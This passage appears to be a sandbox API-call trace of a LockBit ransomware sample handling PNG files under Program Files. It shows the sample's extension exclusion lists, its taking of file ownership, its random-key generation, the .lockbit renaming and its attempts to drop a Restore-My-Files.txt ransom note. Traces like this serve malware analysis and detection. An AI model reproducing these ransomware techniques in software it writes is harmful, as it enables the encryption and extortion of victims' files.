(lpString1=".msi", lpString2=".png") returned -1 [0079.240] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.241] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.241] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.241] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.242] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.242] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.242] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.242] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.242] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.242] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.242] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.243] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.243] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.243] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.243] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.243] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.243] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="MainMenuButtonIcon.png") returned 1 [0079.243] lstrcmpiW (lpString1="ntldr", lpString2="MainMenuButtonIcon.png") returned 1 [0079.243] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="MainMenuButtonIcon.png") returned 1 [0079.243] lstrcmpiW (lpString1="bootsect.bak", lpString2="MainMenuButtonIcon.png") returned -1 [0079.243] lstrcmpiW (lpString1="autorun.inf", lpString2="MainMenuButtonIcon.png") returned -1 [0079.243] lstrcmpiW (lpString1="thumbs.db", lpString2="MainMenuButtonIcon.png") returned 1 [0079.243] lstrcmpiW (lpString1="iconcache.db", lpString2="MainMenuButtonIcon.png") returned -1 [0079.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png") returned=".png" [0079.243] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.243] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.243] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.244] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.245] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.245] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png.lockbit") returned 83 [0079.245] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.246] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.246] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.246] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.246] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.246] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.246] RtlFreeAnsiString (AnsiString="\\") [0079.247] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.247] malloc (_Size=0x200) returned 0x77d800 [0079.247] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.247] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.247] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.247] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.247] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.248] CloseHandle (hObject=0x3c4) returned 1 [0079.248] free (_Block=0x77d800) [0079.248] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.248] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.248] malloc (_Size=0x40068) returned 0x3df0128 [0079.249] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=2922) returned 1 [0079.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0079.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0079.251] ReadFile (in: hFile=0x3c4, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0079.305] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.305] malloc (_Size=0xbc) returned 0x1ff1e60 [0079.305] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xbc, FileInformationClass=0xa) returned 0xc0000008 [0079.305] free (_Block=0x1ff1e60) [0079.305] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.314] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.314] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.314] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7103ef3b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7103ef3b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf63, dwReserved0=0x0, dwReserved1=0x0, cFileName="navSubpicture.png", cAlternateFileName="")) returned 1 [0079.315] lstrcmpiW (lpString1=".", lpString2="navSubpicture.png") returned -1 [0079.315] lstrcmpiW (lpString1="..", lpString2="navSubpicture.png") returned -1 [0079.315] PathFindExtensionW (pszPath="navSubpicture.png") returned=".png" [0079.315] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.315] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.315] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.316] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.316] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.316] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.316] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.316] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.332] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.333] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.333] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="navSubpicture.png") returned 1 [0079.333] lstrcmpiW (lpString1="ntldr", lpString2="navSubpicture.png") returned 1 [0079.333] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="navSubpicture.png") returned 1 [0079.333] lstrcmpiW (lpString1="bootsect.bak", lpString2="navSubpicture.png") returned -1 [0079.334] lstrcmpiW (lpString1="autorun.inf", lpString2="navSubpicture.png") returned -1 [0079.334] lstrcmpiW (lpString1="thumbs.db", lpString2="navSubpicture.png") returned 1 [0079.334] lstrcmpiW (lpString1="iconcache.db", lpString2="navSubpicture.png") returned -1 [0079.334] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.334] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png") returned=".png" [0079.334] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.334] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.334] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.335] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png.lockbit") returned 78 [0079.335] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.336] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.336] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.336] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.336] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.336] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.337] RtlFreeAnsiString (AnsiString="\\") [0079.337] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.337] malloc (_Size=0x200) returned 0x77d800 [0079.337] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.337] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.337] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.337] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.337] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.337] CloseHandle (hObject=0x3c4) returned 1 [0079.337] free (_Block=0x77d800) [0079.338] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.338] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.338] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.338] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3939) returned 1 [0079.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.339] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.346] malloc (_Size=0xb2) returned 0x1ff1e60 [0079.346] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0079.346] free (_Block=0x1ff1e60) [0079.346] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.346] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.347] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.347] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fccb24, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fccb24, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x0, dwReserved1=0x0, cFileName="nav_leftarrow.png", cAlternateFileName="")) returned 1 [0079.347] lstrcmpiW (lpString1=".", lpString2="nav_leftarrow.png") returned -1 [0079.347] lstrcmpiW (lpString1="..", lpString2="nav_leftarrow.png") returned -1 [0079.347] PathFindExtensionW (pszPath="nav_leftarrow.png") returned=".png" [0079.347] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.347] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.347] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 